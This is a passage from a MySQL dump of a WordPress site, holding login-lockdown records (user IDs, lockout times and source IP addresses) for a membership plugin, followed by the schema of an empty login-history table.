09:14:43','3.111.213.154'),(2693,3,'2024-12-05 09:14:43','2024-12-06 09:14:43','3.111.213.154'),(2694,4,'2024-12-05 09:14:43','2024-12-06 09:14:43','3.111.213.154'),(2695,5,'2024-12-05 09:14:43','2024-12-06 09:14:43','3.111.213.154'),(2696,1,'2024-12-05 09:14:43','2024-12-06 09:14:43','3.111.213.154'),(2697,4,'2024-12-05 14:18:48','2024-12-05 14:28:48','103.132.181.181'),(2698,2,'2024-12-05 14:18:48','2024-12-05 14:28:48','103.132.181.181'),(2699,5,'2024-12-05 14:18:49','2024-12-05 14:28:49','103.132.181.181'),(2700,1,'2024-12-05 14:18:49','2024-12-05 14:28:49','103.132.181.181'),(2701,3,'2024-12-05 14:19:03','2024-12-05 14:29:03','103.132.181.181'),(2702,4,'2024-12-05 15:04:32','2024-12-06 15:04:32','103.132.181.181'),(2703,3,'2024-12-05 15:04:32','2024-12-06 15:04:32','103.132.181.181'),(2704,2,'2024-12-05 15:04:33','2024-12-06 15:04:33','103.132.181.181'),(2705,1,'2024-12-05 15:07:22','2024-12-06 15:07:22','103.132.181.181'),(2706,5,'2024-12-05 15:07:22','2024-12-06 15:07:22','103.132.181.181'),(2707,3,'2024-12-05 17:21:17','2024-12-06 17:21:17','45.138.16.77'),(2708,2,'2024-12-05 17:21:17','2024-12-06 17:21:17','45.138.16.77'),(2709,1,'2024-12-05 17:21:18','2024-12-06 17:21:18','45.138.16.77'),(2710,5,'2024-12-05 17:21:18','2024-12-06 17:21:18','45.138.16.77'),(2711,4,'2024-12-05 17:21:19','2024-12-06 17:21:19','45.138.16.77'),(2712,5,'2024-12-07 05:26:07','2024-12-08 05:26:07','45.138.16.77'),(2713,1,'2024-12-07 05:26:07','2024-12-08 05:26:07','45.138.16.77'),(2714,2,'2024-12-07 05:26:07','2024-12-08 05:26:07','45.138.16.77'),(2715,3,'2024-12-07 05:26:07','2024-12-08 05:26:07','45.138.16.77'),(2716,4,'2024-12-07 05:26:07','2024-12-08 05:26:07','45.138.16.77'),(2717,3,'2024-12-08 12:40:39','2024-12-08 12:50:39','34.211.227.172'),(2718,2,'2024-12-08 12:40:39','2024-12-08 12:50:39','34.211.227.172'),(2719,1,'2024-12-08 12:40:39','2024-12-08 12:50:39','34.211.227.172'),(2720,5,'2024-12-08 12:40:40','2024-12-08 12:50:40','34.211.227.172'),(2721,4,'2024-12-08 12:40:40','2024-12-08 12:50:40','34.211.227.172'),(2722,3,'2024-12-08 14:00:40','2024-12-09 14:00:40','34.211.227.172'),(2723,5,'2024-12-08 14:00:40','2024-12-09 14:00:40','34.211.227.172'),(2724,4,'2024-12-08 14:00:40','2024-12-09 14:00:40','34.211.227.172'),(2725,1,'2024-12-08 14:00:40','2024-12-09 14:00:40','34.211.227.172'),(2726,2,'2024-12-08 14:00:40','2024-12-09 14:00:40','34.211.227.172'),(2727,2,'2024-12-09 06:09:55','2024-12-10 06:09:55','45.138.16.77'),(2728,1,'2024-12-09 06:09:55','2024-12-10 06:09:55','45.138.16.77'),(2729,3,'2024-12-09 06:09:55','2024-12-10 06:09:55','45.138.16.77'),(2730,5,'2024-12-09 06:09:55','2024-12-10 06:09:55','45.138.16.77'),(2731,4,'2024-12-09 06:09:55','2024-12-10 06:09:55','45.138.16.77'),(2732,2,'2024-12-10 00:24:57','2024-12-11 00:24:57','167.99.237.102'),(2733,1,'2024-12-10 00:24:57','2024-12-11 00:24:57','167.99.237.102'),(2734,4,'2024-12-10 00:24:57','2024-12-11 00:24:57','167.99.237.102'),(2735,5,'2024-12-10 00:24:57','2024-12-11 00:24:57','167.99.237.102'),(2736,3,'2024-12-10 00:24:59','2024-12-11 00:24:59','167.99.237.102'),(2737,1,'2024-12-10 10:34:08','2024-12-11 10:34:08','45.138.16.77'),(2738,3,'2024-12-10 10:34:08','2024-12-11 10:34:08','45.138.16.77'),(2739,5,'2024-12-10 10:34:08','2024-12-11 10:34:08','45.138.16.77'),(2740,2,'2024-12-10 10:34:08','2024-12-11 10:34:08','45.138.16.77'),(2741,4,'2024-12-10 10:34:08','2024-12-11 10:34:08','45.138.16.77'),(2742,1,'2024-12-11 09:49:19','2024-12-12 09:49:19','167.99.237.102'),(2743,5,'2024-12-11 09:49:19','2024-12-12 09:49:19','167.99.237.102'),(2744,2,'2024-12-11 09:49:19','2024-12-12 09:49:19','167.99.237.102'),(2745,3,'2024-12-11 09:49:19','2024-12-12 09:49:19','167.99.237.102'),(2746,4,'2024-12-11 09:49:19','2024-12-12 09:49:19','167.99.237.102'),(2747,1,'2024-12-11 23:07:12','2024-12-11 23:17:12','20.204.104.7'),(2748,1,'2024-12-11 23:17:59','2024-12-11 23:27:59','20.204.104.7'),(2749,1,'2024-12-12 06:27:03','2024-12-13 06:27:03','20.204.104.7'),(2750,1,'2024-12-12 12:48:12','2024-12-13 12:48:12','15.206.74.167'),(2751,4,'2024-12-12 12:48:12','2024-12-13 12:48:12','15.206.74.167'),(2752,5,'2024-12-12 12:48:13','2024-12-13 12:48:13','15.206.74.167'),(2753,2,'2024-12-12 12:48:13','2024-12-13 12:48:13','15.206.74.167'),(2754,3,'2024-12-12 12:48:14','2024-12-13 12:48:14','15.206.74.167'),(2755,1,'2024-12-12 13:10:20','2024-12-12 13:20:20','52.172.220.12'),(2756,4,'2024-12-13 08:10:26','2024-12-13 08:20:26','35.91.94.76'),(2757,2,'2024-12-13 08:10:26','2024-12-13 08:20:26','35.91.94.76'),(2758,5,'2024-12-13 08:10:26','2024-12-13 08:20:26','35.91.94.76'),(2759,1,'2024-12-13 08:10:26','2024-12-13 08:20:26','35.91.94.76'),(2760,3,'2024-12-13 08:10:26','2024-12-13 08:20:26','35.91.94.76'),(2761,2,'2024-12-13 08:48:41','2024-12-14 08:48:41','35.91.94.76'),(2762,4,'2024-12-13 08:48:41','2024-12-14 08:48:41','35.91.94.76'),(2763,3,'2024-12-13 08:48:41','2024-12-14 08:48:41','35.91.94.76'),(2764,5,'2024-12-13 08:48:41','2024-12-14 08:48:41','35.91.94.76'),(2765,1,'2024-12-13 08:48:41','2024-12-14 08:48:41','35.91.94.76'),(2766,3,'2024-12-13 21:03:26','2024-12-14 21:03:26','54.211.122.86'),(2767,4,'2024-12-13 21:03:26','2024-12-14 21:03:26','54.211.122.86'),(2768,2,'2024-12-13 21:03:26','2024-12-14 21:03:26','54.211.122.86'),(2769,5,'2024-12-13 21:03:26','2024-12-14 21:03:26','54.211.122.86'),(2770,1,'2024-12-13 21:03:26','2024-12-14 21:03:26','54.211.122.86'),(2771,0,'2024-12-13 21:28:22','2024-12-13 21:38:22','45.130.145.4'),(2772,2,'2024-12-13 23:18:42','2024-12-14 23:18:42','35.92.39.49'),(2773,3,'2024-12-13 23:18:42','2024-12-14 23:18:42','35.92.39.49'),(2774,1,'2024-12-13 23:18:42','2024-12-14 23:18:42','35.92.39.49'),(2775,4,'2024-12-13 23:18:42','2024-12-14 23:18:42','35.92.39.49'),(2776,5,'2024-12-13 23:18:44','2024-12-14 23:18:44','35.92.39.49'),(2777,4,'2024-12-13 23:24:03','2024-12-14 23:24:03','13.233.173.121'),(2778,2,'2024-12-13 23:24:03','2024-12-14 23:24:03','13.233.173.121'),(2779,3,'2024-12-13 23:24:03','2024-12-14 23:24:03','13.233.173.121'),(2780,1,'2024-12-13 23:24:03','2024-12-14 23:24:03','13.233.173.121'),(2781,5,'2024-12-13 23:24:03','2024-12-14 23:24:03','13.233.173.121'),(2782,2,'2024-12-15 03:44:10','2024-12-16 03:44:10','45.138.16.77'),(2783,3,'2024-12-15 03:44:10','2024-12-16 03:44:10','45.138.16.77'),(2784,5,'2024-12-15 03:44:10','2024-12-16 03:44:10','45.138.16.77'),(2785,4,'2024-12-15 03:44:10','2024-12-16 03:44:10','45.138.16.77'),(2786,1,'2024-12-15 03:44:10','2024-12-16 03:44:10','45.138.16.77'),(2787,5,'2024-12-15 17:16:37','2024-12-16 17:16:37','34.222.136.254'),(2788,2,'2024-12-15 17:16:37','2024-12-16 17:16:37','34.222.136.254'),(2789,4,'2024-12-15 17:16:37','2024-12-16 17:16:37','34.222.136.254'),(2790,3,'2024-12-15 17:16:37','2024-12-16 17:16:37','34.222.136.254'),(2791,1,'2024-12-15 17:16:37','2024-12-16 17:16:37','34.222.136.254'),(2792,3,'2024-12-16 03:22:14','2024-12-17 03:22:14','13.233.173.121'),(2793,2,'2024-12-16 03:22:15','2024-12-17 03:22:15','13.233.173.121'),(2794,5,'2024-12-16 03:22:16','2024-12-17 03:22:16','13.233.173.121'),(2795,4,'2024-12-16 03:22:16','2024-12-17 03:22:16','13.233.173.121'),(2796,1,'2024-12-16 03:22:17','2024-12-17 03:22:17','13.233.173.121'),(2797,2,'2024-12-16 14:02:51','2024-12-17 14:02:51','45.138.16.77'),(2798,4,'2024-12-16 14:02:52','2024-12-17 14:02:52','45.138.16.77'),(2799,1,'2024-12-16 14:02:52','2024-12-17 14:02:52','45.138.16.77'),(2800,5,'2024-12-16 14:02:52','2024-12-17 14:02:52','45.138.16.77'),(2801,3,'2024-12-16 14:02:52','2024-12-17 14:02:52','45.138.16.77'),(2802,2,'2024-12-17 13:35:37','2024-12-18 13:35:37','65.2.126.100'),(2803,3,'2024-12-17 13:35:37','2024-12-18 13:35:37','65.2.126.100'),(2804,1,'2024-12-17 13:35:37','2024-12-18 13:35:37','65.2.126.100'),(2805,5,'2024-12-17 13:35:38','2024-12-18 13:35:38','65.2.126.100'),(2806,4,'2024-12-17 13:35:39','2024-12-18 13:35:39','65.2.126.100'),(2807,3,'2024-12-17 15:18:08','2024-12-18 15:18:08','45.138.16.77'),(2808,2,'2024-12-17 15:18:08','2024-12-18 15:18:08','45.138.16.77'),(2809,5,'2024-12-17 15:18:08','2024-12-18 15:18:08','45.138.16.77'),(2810,4,'2024-12-17 15:18:08','2024-12-18 15:18:08','45.138.16.77'),(2811,1,'2024-12-17 15:18:08','2024-12-18 15:18:08','45.138.16.77'),(2812,1,'2024-12-17 21:14:32','2024-12-18 21:14:32','65.2.180.15'),(2813,3,'2024-12-17 21:14:32','2024-12-18 21:14:32','65.2.180.15'),(2814,5,'2024-12-17 21:14:33','2024-12-18 21:14:33','65.2.180.15'),(2815,4,'2024-12-17 21:14:33','2024-12-18 21:14:33','65.2.180.15'),(2816,2,'2024-12-17 21:14:34','2024-12-18 21:14:34','65.2.180.15'),(2817,2,'2024-12-18 09:29:52','2024-12-19 09:29:52','52.66.206.181'),(2818,5,'2024-12-18 09:29:52','2024-12-19 09:29:52','52.66.206.181'),(2819,3,'2024-12-18 09:29:52','2024-12-19 09:29:52','52.66.206.181'),(2820,1,'2024-12-18 09:29:53','2024-12-19 09:29:53','52.66.206.181'),(2821,4,'2024-12-18 09:29:53','2024-12-19 09:29:53','52.66.206.181'),(2822,4,'2024-12-18 12:11:07','2024-12-19 12:11:07','65.2.175.154'),(2823,3,'2024-12-18 12:11:07','2024-12-19 12:11:07','65.2.175.154'),(2824,2,'2024-12-18 12:11:07','2024-12-19 12:11:07','65.2.175.154'),(2825,1,'2024-12-18 12:11:07','2024-12-19 12:11:07','65.2.175.154'),(2826,5,'2024-12-18 12:11:09','2024-12-19 12:11:09','65.2.175.154'),(2827,1,'2024-12-21 09:09:14','2024-12-22 09:09:14','45.138.16.77'),(2828,4,'2024-12-21 09:09:14','2024-12-22 09:09:14','45.138.16.77'),(2829,5,'2024-12-21 09:09:14','2024-12-22 09:09:14','45.138.16.77'),(2830,2,'2024-12-21 09:09:16','2024-12-22 09:09:16','45.138.16.77'),(2831,3,'2024-12-21 09:09:16','2024-12-22 09:09:16','45.138.16.77'),(2832,0,'2024-12-24 10:19:28','2024-12-24 10:29:28','45.130.145.4'),(2833,2,'2024-12-29 00:11:53','2024-12-30 00:11:53','54.210.113.129'),(2834,3,'2024-12-29 00:11:53','2024-12-30 00:11:53','54.210.113.129'),(2835,4,'2024-12-29 00:11:53','2024-12-30 00:11:53','54.210.113.129'),(2836,5,'2024-12-29 00:11:53','2024-12-30 00:11:53','54.210.113.129'),(2837,1,'2024-12-29 00:11:53','2024-12-30 00:11:53','54.210.113.129'),(2838,3,'2025-01-07 10:30:00','2025-01-08 10:30:00','64.23.151.246'),(2839,4,'2025-01-07 10:30:00','2025-01-08 10:30:00','64.23.151.246'),(2840,2,'2025-01-07 10:30:00','2025-01-08 10:30:00','64.23.151.246'),(2841,5,'2025-01-07 10:30:02','2025-01-08 10:30:02','64.23.151.246'),(2842,1,'2025-01-07 10:30:02','2025-01-08 10:30:02','64.23.151.246'),(2843,0,'2025-01-11 01:18:09','2025-01-11 01:28:09','194.26.192.111'),(2844,1,'2025-01-11 11:28:22','2025-01-12 11:28:22','145.239.154.4'),(2845,3,'2025-01-11 11:28:22','2025-01-12 11:28:22','145.239.154.4'),(2846,0,'2025-01-11 11:28:22','2025-01-12 11:28:22','145.239.154.4'),(2847,0,'2025-01-12 16:52:17','2025-01-13 16:52:17','145.239.154.4'),(2848,1,'2025-01-12 16:52:17','2025-01-13 16:52:17','145.239.154.4'),(2849,3,'2025-01-12 16:52:17','2025-01-13 16:52:17','145.239.154.4'),(2850,0,'2025-01-13 23:54:09','2025-01-14 23:54:09','145.239.154.4'),(2851,3,'2025-01-13 23:54:09','2025-01-14 23:54:09','145.239.154.4'),(2852,1,'2025-01-13 23:54:09','2025-01-14 23:54:09','145.239.154.4'),(2853,4,'2025-01-14 09:57:30','2025-01-15 09:57:30','128.199.157.221'),(2854,3,'2025-01-14 09:57:30','2025-01-15 09:57:30','128.199.157.221'),(2855,5,'2025-01-14 09:57:30','2025-01-15 09:57:30','128.199.157.221'),(2856,2,'2025-01-14 09:57:30','2025-01-15 09:57:30','128.199.157.221'),(2857,1,'2025-01-14 09:57:30','2025-01-15 09:57:30','128.199.157.221'),(2858,1,'2025-01-14 10:41:33','2025-01-15 10:41:33','152.42.193.218'),(2859,3,'2025-01-14 10:41:33','2025-01-15 10:41:33','152.42.193.218'),(2860,2,'2025-01-14 10:41:33','2025-01-15 10:41:33','152.42.193.218'),(2861,4,'2025-01-14 10:41:33','2025-01-15 10:41:33','152.42.193.218'),(2862,5,'2025-01-14 10:41:33','2025-01-15 10:41:33','152.42.193.218'),(2863,0,'2025-01-14 18:36:45','2025-01-14 18:46:45','152.42.193.218'),(2864,1,'2025-01-15 06:18:08','2025-01-15 06:28:08','92.205.22.178'),(2865,3,'2025-01-15 14:11:32','2025-01-16 14:11:32','152.42.193.218'),(2866,1,'2025-01-15 14:11:32','2025-01-16 14:11:32','152.42.193.218'),(2867,4,'2025-01-15 14:11:32','2025-01-16 14:11:32','152.42.193.218'),(2868,5,'2025-01-15 14:11:32','2025-01-16 14:11:32','152.42.193.218'),(2869,2,'2025-01-15 14:11:32','2025-01-16 14:11:32','152.42.193.218'),(2870,1,'2025-01-15 21:43:21','2025-01-16 21:43:21','103.71.22.38'),(2871,5,'2025-01-15 23:31:47','2025-01-15 23:41:47','103.71.22.38'),(2872,4,'2025-01-15 23:31:47','2025-01-15 23:41:47','103.71.22.38'),(2873,3,'2025-01-15 23:31:49','2025-01-15 23:41:49','103.71.22.38'),(2874,2,'2025-01-15 23:45:31','2025-01-15 23:55:31','103.71.22.38'),(2875,5,'2025-01-15 23:51:09','2025-01-16 00:01:09','103.71.22.38'),(2876,4,'2025-01-15 23:51:09','2025-01-16 00:01:09','103.71.22.38'),(2877,3,'2025-01-15 23:51:09','2025-01-16 00:01:09','103.71.22.38'),(2878,2,'2025-01-16 00:00:13','2025-01-17 00:00:13','103.71.22.38'),(2879,5,'2025-01-16 00:02:53','2025-01-17 00:02:53','103.71.22.38'),(2880,4,'2025-01-16 00:02:53','2025-01-17 00:02:53','103.71.22.38'),(2881,3,'2025-01-16 00:05:35','2025-01-17 00:05:35','103.71.22.38'),(2882,1,'2025-01-16 12:03:44','2025-01-17 12:03:44','128.199.157.221'),(2883,2,'2025-01-16 12:03:44','2025-01-17 12:03:44','128.199.157.221'),(2884,4,'2025-01-16 12:03:44','2025-01-17 12:03:44','128.199.157.221'),(2885,3,'2025-01-16 12:03:44','2025-01-17 12:03:44','128.199.157.221'),(2886,5,'2025-01-16 12:03:44','2025-01-17 12:03:44','128.199.157.221'),(2887,1,'2025-01-16 20:01:04','2025-01-16 20:11:04','143.244.128.235'),(2888,2,'2025-01-16 23:35:19','2025-01-17 23:35:19','45.83.31.45'),(2889,5,'2025-01-16 23:35:19','2025-01-17 23:35:19','45.83.31.45'),(2890,3,'2025-01-16 23:35:19','2025-01-17 23:35:19','45.83.31.45'),(2891,4,'2025-01-16 23:35:19','2025-01-17 23:35:19','45.83.31.45'),(2892,1,'2025-01-16 23:35:19','2025-01-17 23:35:19','45.83.31.45'),(2893,2,'2025-01-18 05:41:21','2025-01-19 05:41:21','185.241.208.199'),(2894,1,'2025-01-18 05:41:21','2025-01-19 05:41:21','185.241.208.199'),(2895,5,'2025-01-18 05:41:21','2025-01-19 05:41:21','185.241.208.199'),(2896,4,'2025-01-18 05:41:21','2025-01-19 05:41:21','185.241.208.199'),(2897,3,'2025-01-18 05:41:21','2025-01-19 05:41:21','185.241.208.199'),(2898,2,'2025-01-18 13:10:10','2025-01-19 13:10:10','54.85.200.55'),(2899,4,'2025-01-18 13:10:10','2025-01-19 13:10:10','54.85.200.55'),(2900,5,'2025-01-18 13:10:10','2025-01-19 13:10:10','54.85.200.55'),(2901,1,'2025-01-18 13:10:10','2025-01-19 13:10:10','54.85.200.55'),(2902,3,'2025-01-18 13:16:45','2025-01-19 13:16:45','54.85.200.55'),(2903,1,'2025-01-21 00:34:42','2025-01-21 00:44:42','167.172.151.228'),(2904,2,'2025-01-22 21:09:46','2025-01-23 21:09:46','157.230.184.38'),(2905,5,'2025-01-22 21:09:46','2025-01-23 21:09:46','157.230.184.38'),(2906,3,'2025-01-22 21:09:46','2025-01-23 21:09:46','157.230.184.38'),(2907,4,'2025-01-22 21:09:46','2025-01-23 21:09:46','157.230.184.38'),(2908,1,'2025-01-22 21:09:46','2025-01-23 21:09:46','157.230.184.38'),(2909,1,'2025-01-27 04:04:21','2025-01-28 04:04:21','165.22.184.180'),(2910,3,'2025-01-27 04:04:21','2025-01-28 04:04:21','165.22.184.180'),(2911,5,'2025-01-27 04:04:21','2025-01-28 04:04:21','165.22.184.180'),(2912,2,'2025-01-27 04:04:21','2025-01-28 04:04:21','165.22.184.180'),(2913,4,'2025-01-27 04:04:21','2025-01-28 04:04:21','165.22.184.180'),(2914,4,'2025-01-31 21:57:31','2025-02-01 21:57:31','64.23.150.12'),(2915,1,'2025-01-31 21:57:32','2025-02-01 21:57:32','64.23.150.12'),(2916,3,'2025-01-31 21:57:32','2025-02-01 21:57:32','64.23.150.12'),(2917,2,'2025-01-31 21:57:32','2025-02-01 21:57:32','64.23.150.12'),(2918,5,'2025-01-31 21:57:32','2025-02-01 21:57:32','64.23.150.12'),(2919,1,'2025-02-03 01:37:22','2025-02-03 01:47:22','162.19.75.123'),(2920,1,'2025-02-04 16:32:19','2025-02-04 16:42:19','92.222.101.84'),(2921,5,'2025-02-10 03:25:02','2025-02-11 03:25:02','35.85.217.48'),(2922,4,'2025-02-10 03:25:02','2025-02-11 03:25:02','35.85.217.48'),(2923,1,'2025-02-10 03:25:02','2025-02-11 03:25:02','35.85.217.48'),(2924,2,'2025-02-10 03:25:02','2025-02-11 03:25:02','35.85.217.48'),(2925,3,'2025-02-10 03:25:02','2025-02-11 03:25:02','35.85.217.48'),(2926,3,'2025-02-16 06:48:15','2025-02-17 06:48:15','64.23.151.246'),(2927,1,'2025-02-16 06:48:15','2025-02-17 06:48:15','64.23.151.246'),(2928,5,'2025-02-16 06:48:15','2025-02-17 06:48:15','64.23.151.246'),(2929,4,'2025-02-16 06:48:15','2025-02-17 06:48:15','64.23.151.246'),(2930,2,'2025-02-16 06:48:16','2025-02-17 06:48:16','64.23.151.246'),(2931,2,'2025-02-16 21:18:08','2025-02-17 21:18:08','64.23.150.12'),(2932,3,'2025-02-16 21:18:09','2025-02-17 21:18:09','64.23.150.12'),(2933,4,'2025-02-16 21:18:09','2025-02-17 21:18:09','64.23.150.12'),(2934,5,'2025-02-16 21:18:09','2025-02-17 21:18:09','64.23.150.12'),(2935,1,'2025-02-16 21:18:15','2025-02-17 21:18:15','64.23.150.12'),(2936,0,'2025-02-20 12:29:18','2025-02-21 12:29:18','145.239.154.4'),(2937,3,'2025-02-20 13:05:11','2025-02-21 13:05:11','145.239.154.4'),(2938,1,'2025-02-20 14:02:36','2025-02-21 14:02:36','145.239.154.4'),(2939,1,'2025-02-20 15:58:45','2025-02-20 16:08:45','54.37.152.129'),(2940,1,'2025-03-01 05:47:58','2025-03-01 05:57:58','54.36.181.10'),(2941,1,'2025-03-06 15:45:46','2025-03-07 15:45:46','92.255.57.103'),(2942,0,'2025-03-06 17:09:55','2025-03-07 17:09:55','92.255.57.103'),(2943,3,'2025-03-06 22:51:28','2025-03-07 22:51:28','92.255.57.103'),(2944,4,'2025-03-06 22:51:29','2025-03-07 22:51:29','92.255.57.103'),(2945,1,'2025-03-08 18:55:02','2025-03-09 18:55:02','35.154.135.188'),(2946,2,'2025-03-08 18:55:02','2025-03-09 18:55:02','35.154.135.188'),(2947,3,'2025-03-08 18:55:02','2025-03-09 18:55:02','35.154.135.188'),(2948,4,'2025-03-08 18:55:02','2025-03-09 18:55:02','35.154.135.188'),(2949,5,'2025-03-08 18:55:03','2025-03-09 18:55:03','35.154.135.188'),(2950,1,'2025-03-12 06:51:26','2025-03-12 07:01:26','193.70.37.1'),(2951,1,'2025-03-12 22:38:11','2025-03-12 22:48:11','54.36.181.10'),(2952,3,'2025-03-21 22:50:54','2025-03-22 22:50:54','174.138.54.206'),(2953,1,'2025-03-21 22:50:54','2025-03-22 22:50:54','174.138.54.206'),(2954,4,'2025-03-21 22:50:54','2025-03-22 22:50:54','174.138.54.206'),(2955,5,'2025-03-21 22:50:54','2025-03-22 22:50:54','174.138.54.206'),(2956,2,'2025-03-21 22:50:54','2025-03-22 22:50:54','174.138.54.206'),(2957,1,'2025-03-24 15:54:26','2025-03-24 16:04:26','132.145.158.64'),(2958,1,'2025-03-24 16:08:56','2025-03-24 16:18:56','132.145.158.64'),(2959,1,'2025-03-24 16:20:46','2025-03-25 16:20:46','132.145.158.64'),(2960,1,'2025-04-06 12:53:12','2025-04-06 13:03:12','162.243.233.47'),(2961,3,'2025-04-10 11:37:10','2025-04-11 11:37:10','152.42.255.97'),(2962,1,'2025-04-10 11:37:10','2025-04-11 11:37:10','152.42.255.97'),(2963,4,'2025-04-10 11:37:10','2025-04-11 11:37:10','152.42.255.97'),(2964,5,'2025-04-10 11:37:10','2025-04-11 11:37:10','152.42.255.97'),(2965,2,'2025-04-10 11:37:10','2025-04-11 11:37:10','152.42.255.97'),(2966,1,'2025-04-14 11:58:31','2025-04-14 12:08:31','103.197.184.218'),(2967,1,'2025-04-15 20:45:37','2025-04-15 20:55:37','20.83.185.217'),(2968,1,'2025-04-16 01:49:56','2025-04-16 01:59:56','128.199.201.0'),(2969,1,'2025-04-18 16:57:01','2025-04-18 17:07:01','146.59.227.21'),(2970,1,'2025-04-18 17:07:10','2025-04-18 17:17:10','146.59.227.21'),(2971,1,'2025-04-18 17:17:18','2025-04-19 17:17:18','146.59.227.21'),(2972,1,'2025-04-23 14:23:44','2025-04-23 14:33:44','170.64.166.21'),(2973,1,'2025-04-23 14:33:51','2025-04-23 14:43:51','170.64.166.21'),(2974,1,'2025-04-23 14:43:59','2025-04-24 14:43:59','170.64.166.21'),(2975,0,'2025-04-24 06:27:57','2025-04-24 06:37:57','146.190.97.112'),(2976,0,'2025-04-24 06:38:05','2025-04-24 06:48:05','146.190.97.112'),(2977,0,'2025-04-24 06:48:13','2025-04-25 06:48:13','146.190.97.112'),(2978,1,'2025-04-27 08:02:44','2025-04-27 08:12:44','151.80.139.240'),(2979,1,'2025-04-27 08:12:52','2025-04-27 08:22:52','151.80.139.240'),(2980,1,'2025-04-27 08:23:00','2025-04-28 08:23:00','151.80.139.240'),(2981,1,'2025-05-01 03:04:50','2025-05-01 03:14:50','196.251.112.104'),(2982,5,'2025-05-01 03:04:50','2025-05-01 03:14:50','196.251.112.104'),(2983,2,'2025-05-01 03:04:50','2025-05-01 03:14:50','196.251.112.104'),(2984,4,'2025-05-01 03:04:50','2025-05-01 03:14:50','196.251.112.104'),(2985,3,'2025-05-01 03:04:50','2025-05-01 03:14:50','196.251.112.104'),(2986,2,'2025-05-01 03:41:30','2025-05-02 03:41:30','196.251.112.104'),(2987,1,'2025-05-01 03:41:30','2025-05-02 03:41:30','196.251.112.104'),(2988,4,'2025-05-01 03:41:30','2025-05-02 03:41:30','196.251.112.104'),(2989,3,'2025-05-01 03:41:30','2025-05-02 03:41:30','196.251.112.104'),(2990,5,'2025-05-01 03:41:30','2025-05-02 03:41:30','196.251.112.104'),(2991,4,'2025-05-02 04:24:38','2025-05-03 04:24:38','196.251.112.104'),(2992,1,'2025-05-02 04:24:38','2025-05-03 04:24:38','196.251.112.104'),(2993,5,'2025-05-02 04:24:38','2025-05-03 04:24:38','196.251.112.104'),(2994,3,'2025-05-02 04:24:38','2025-05-03 04:24:38','196.251.112.104'),(2995,2,'2025-05-02 04:24:38','2025-05-03 04:24:38','196.251.112.104'),(2996,5,'2025-05-05 23:44:41','2025-05-06 23:44:41','107.151.209.126'),(2997,1,'2025-05-05 23:44:41','2025-05-06 23:44:41','107.151.209.126'),(2998,3,'2025-05-05 23:44:41','2025-05-06 23:44:41','107.151.209.126'),(2999,4,'2025-05-05 23:44:41','2025-05-06 23:44:41','107.151.209.126'),(3000,2,'2025-05-05 23:44:41','2025-05-06 23:44:41','107.151.209.126'),(3001,3,'2025-05-09 07:10:31','2025-05-10 07:10:31','35.154.1.88'),(3002,1,'2025-05-09 07:10:32','2025-05-10 07:10:32','35.154.1.88'),(3003,2,'2025-05-09 07:10:33','2025-05-10 07:10:33','35.154.1.88'),(3004,4,'2025-05-09 07:10:33','2025-05-10 07:10:33','35.154.1.88'),(3005,5,'2025-05-09 07:10:34','2025-05-10 07:10:34','35.154.1.88'),(3006,1,'2025-05-09 22:51:59','2025-05-09 23:01:59','109.176.202.52'),(3007,1,'2025-05-09 23:02:07','2025-05-09 23:12:07','109.176.202.52'),(3008,1,'2025-05-09 23:12:14','2025-05-10 23:12:14','109.176.202.52'),(3009,2,'2025-05-10 04:14:47','2025-05-11 04:14:47','13.201.84.118'),(3010,1,'2025-05-10 04:14:47','2025-05-11 04:14:47','13.201.84.118'),(3011,4,'2025-05-10 04:14:47','2025-05-11 04:14:47','13.201.84.118'),(3012,5,'2025-05-10 04:14:48','2025-05-11 04:14:48','13.201.84.118'),(3013,3,'2025-05-10 04:14:48','2025-05-11 04:14:48','13.201.84.118'),(3014,3,'2025-05-10 10:08:13','2025-05-11 10:08:13','35.154.1.88'),(3015,4,'2025-05-10 10:08:13','2025-05-11 10:08:13','35.154.1.88'),(3016,2,'2025-05-10 10:08:13','2025-05-11 10:08:13','35.154.1.88'),(3017,5,'2025-05-10 10:08:13','2025-05-11 10:08:13','35.154.1.88'),(3018,1,'2025-05-10 10:08:13','2025-05-11 10:08:13','35.154.1.88'),(3019,3,'2025-05-11 23:29:05','2025-05-12 23:29:05','13.233.245.36'),(3020,4,'2025-05-11 23:29:05','2025-05-12 23:29:05','13.233.245.36'),(3021,5,'2025-05-11 23:29:05','2025-05-12 23:29:05','13.233.245.36'),(3022,2,'2025-05-11 23:29:05','2025-05-12 23:29:05','13.233.245.36'),(3023,1,'2025-05-11 23:29:05','2025-05-12 23:29:05','13.233.245.36'),(3024,3,'2025-05-12 20:21:04','2025-05-13 20:21:04','13.127.208.15'),(3025,4,'2025-05-12 20:21:04','2025-05-13 20:21:04','13.127.208.15'),(3026,2,'2025-05-12 20:21:04','2025-05-13 20:21:04','13.127.208.15'),(3027,1,'2025-05-12 20:21:05','2025-05-13 20:21:05','13.127.208.15'),(3028,5,'2025-05-12 20:21:05','2025-05-13 20:21:05','13.127.208.15'),(3029,1,'2025-05-13 05:44:25','2025-05-14 05:44:25','43.205.255.0'),(3030,4,'2025-05-13 05:44:25','2025-05-14 05:44:25','43.205.255.0'),(3031,2,'2025-05-13 05:44:25','2025-05-14 05:44:25','43.205.255.0'),(3032,5,'2025-05-13 05:44:25','2025-05-14 05:44:25','43.205.255.0'),(3033,3,'2025-05-13 05:44:25','2025-05-14 05:44:25','43.205.255.0');
/*!40000 ALTER TABLE `wp_arm_lockdown` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_arm_login_history`
--

DROP TABLE IF EXISTS `wp_arm_login_history`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_arm_login_history` (
  `arm_history_id` int(11) NOT NULL AUTO_INCREMENT,
  `arm_user_id` int(11) NOT NULL,
  `arm_logged_in_ip` varchar(255) NOT NULL,
  `arm_logged_in_date` datetime NOT NULL,
  `arm_logout_date` datetime NOT NULL,
  `arm_login_duration` time NOT NULL,
  `arm_history_browser` varchar(255) NOT NULL,
  `arm_history_session` varchar(255) NOT NULL,
  `arm_login_country` varchar(255) NOT NULL,
  `arm_user_current_status` int(1) NOT NULL DEFAULT 0,
  PRIMARY KEY (`arm_history_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_arm_login_history`
--

LOCK TABLES `wp_arm_login_history` WRITE;
/*!40000 ALTER TABLE `wp_arm_login_history` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_arm_login_history` ENABLE KEYS */;
UNLOCK TABLES;

--
